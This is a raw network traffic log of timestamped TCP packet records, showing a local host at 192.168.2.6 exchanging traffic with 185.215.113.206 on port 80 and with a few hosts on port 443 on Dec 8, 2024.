Dec 8, 2024 13:31:22.750864983 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.750909090 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.751022100 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.751842976 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.751893044 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.751955032 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.752053976 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.752913952 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.752935886 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.752964973 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.752985954 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.753870964 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.753926992 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.754003048 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.754051924 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.754913092 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.754955053 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.755053043 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.755153894 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.756309032 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.756395102 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.756439924 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.757356882 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.757404089 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.757456064 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.757496119 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.758507967 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.758560896 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.758563042 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.758688927 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.759304047 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.759355068 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.759392023 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.759428024 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.760046005 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.760098934 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.771084070 CET	443	49743	23.206.197.26	192.168.2.6
Dec 8, 2024 13:31:22.771148920 CET	49743	443	192.168.2.6	23.206.197.26
Dec 8, 2024 13:31:22.775746107 CET	49743	443	192.168.2.6	23.206.197.26
Dec 8, 2024 13:31:22.775763988 CET	443	49743	23.206.197.26	192.168.2.6
Dec 8, 2024 13:31:22.775921106 CET	49743	443	192.168.2.6	23.206.197.26
Dec 8, 2024 13:31:22.775928974 CET	443	49743	23.206.197.26	192.168.2.6
Dec 8, 2024 13:31:22.775979042 CET	443	49743	23.206.197.26	192.168.2.6
Dec 8, 2024 13:31:22.776038885 CET	49743	443	192.168.2.6	23.206.197.26
Dec 8, 2024 13:31:22.797485113 CET	443	49744	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:22.797578096 CET	49744	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:22.798079014 CET	49744	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:22.798086882 CET	443	49744	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:22.798441887 CET	49744	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:22.798448086 CET	443	49744	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:22.812927008 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.812979937 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.812987089 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.813016891 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.813344955 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.813385963 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.813457966 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.813699007 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.814397097 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.814548969 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.814582109 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.814704895 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.815229893 CET	443	49745	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:22.815392017 CET	49745	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:22.815397978 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.815489054 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.815519094 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.815587997 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.815728903 CET	49745	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:22.815737963 CET	443	49745	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:22.815884113 CET	49745	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:22.815887928 CET	443	49745	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:22.816412926 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.816514015 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.816540956 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.816659927 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.817691088 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.817715883 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.817827940 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.818581104 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.818624020 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.818661928 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.818777084 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.819466114 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.819505930 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.819531918 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.819649935 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.820282936 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.820382118 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.820436001 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.820540905 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.821293116 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.821381092 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.821409941 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.821470976 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.822252989 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.822331905 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.822369099 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.822489977 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.823237896 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.823292971 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.823347092 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.823504925 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.824275970 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.824361086 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.824384928 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.824428082 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.825221062 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.825326920 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.825359106 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.825454950 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.826251984 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.826359034 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.826410055 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.826504946 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.827194929 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.827353954 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.827383995 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.827472925 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.828318119 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.828424931 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.828447104 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.828541994 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.829221010 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.829304934 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.829483032 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.830199003 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.830307961 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.830533028 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.831166983 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.831316948 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.831338882 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.832185984 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.832281113 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.832300901 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.832385063 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.833139896 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.833249092 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.833453894 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.834156036 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.834214926 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.834244013 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.834422112 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.835197926 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.835266113 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.835292101 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.835365057 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.836137056 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.836200953 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.836256027 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.836380005 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.837141037 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.837202072 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.837239027 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.837368011 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.838108063 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.838162899 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.838167906 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.838274002 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.874212980 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.874272108 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.874411106 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.874675989 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.874886990 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.874984026 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.875015974 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.875130892 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.875875950 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.875916004 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.875951052 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.876199961 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.876866102 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.876900911 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.876926899 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.876990080 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.877870083 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.877916098 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.877943993 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.878014088 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.878838062 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.878930092 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.878954887 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.879019022 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.879856110 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.879986048 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.879996061 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.880105972 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.880831003 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.880949020 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.881145954 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.882265091 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.882375002 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.882400036 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.882488966 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.883274078 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.883379936 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.883409977 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.883496046 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.884309053 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.884368896 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.884392023 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.884450912 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.885379076 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.885492086 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.885518074 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.885617971 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.886480093 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.886545897 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.886573076 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.886672974 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.887552977 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.887703896 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.887727022 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.887794018 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.888855934 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.888967037 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.889049053 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.889137030 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.889966011 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.890037060 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.890095949 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.890211105 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.890988111 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.891076088 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.943116903 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.943178892 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.943197012 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.943286896 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.943521976 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.943610907 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.943624020 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.943654060 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.944448948 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.944478035 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.944504976 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.944607973 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.945163965 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.945269108 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.945274115 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.945372105 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.946197033 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.946301937 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.946362972 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.946362972 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.947182894 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.947266102 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.947288036 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.947441101 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:22.947463036 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:22.947468042 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.947478056 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:22.947499037 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:22.947751999 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:22.947762012 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:22.947849989 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:22.948133945 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.948245049 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.948272943 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.949242115 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.949338913 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.949572086 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.949656963 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.950113058 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.950414896 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.950606108 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.951106071 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.951248884 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.951276064 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.952452898 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.004878998 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.005029917 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.005062103 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.005170107 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.005428076 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.005530119 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.005600929 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.005698919 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.006472111 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.006567955 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.006592989 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.006709099 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.007678032 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.007738113 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.007766008 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.007822037 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.009484053 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.009569883 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.009593010 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.009680033 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.010813951 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.010920048 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.010940075 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.010998964 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.011720896 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.011811972 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.011881113 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.011990070 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.012758017 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.012811899 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.012815952 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.012989044 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.013793945 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.013897896 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.013900995 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.014022112 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.014480114 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.014539957 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.014595032 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.014856100 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.015499115 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.015547037 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.015599012 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.015599012 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.016323090 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.016381979 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.016412973 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.016510010 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.017317057 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.017399073 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.017615080 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.017713070 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.018191099 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.018306017 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.018460989 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.018925905 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.019006968 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.019119978 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.019236088 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.019804001 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.019851923 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.019876003 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.019979000 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.020364046 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.020386934 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.020412922 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.020514965 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.021259069 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.021312952 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.021325111 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.021485090 CET	49724	80	192.168.2.6	185.215.113.206
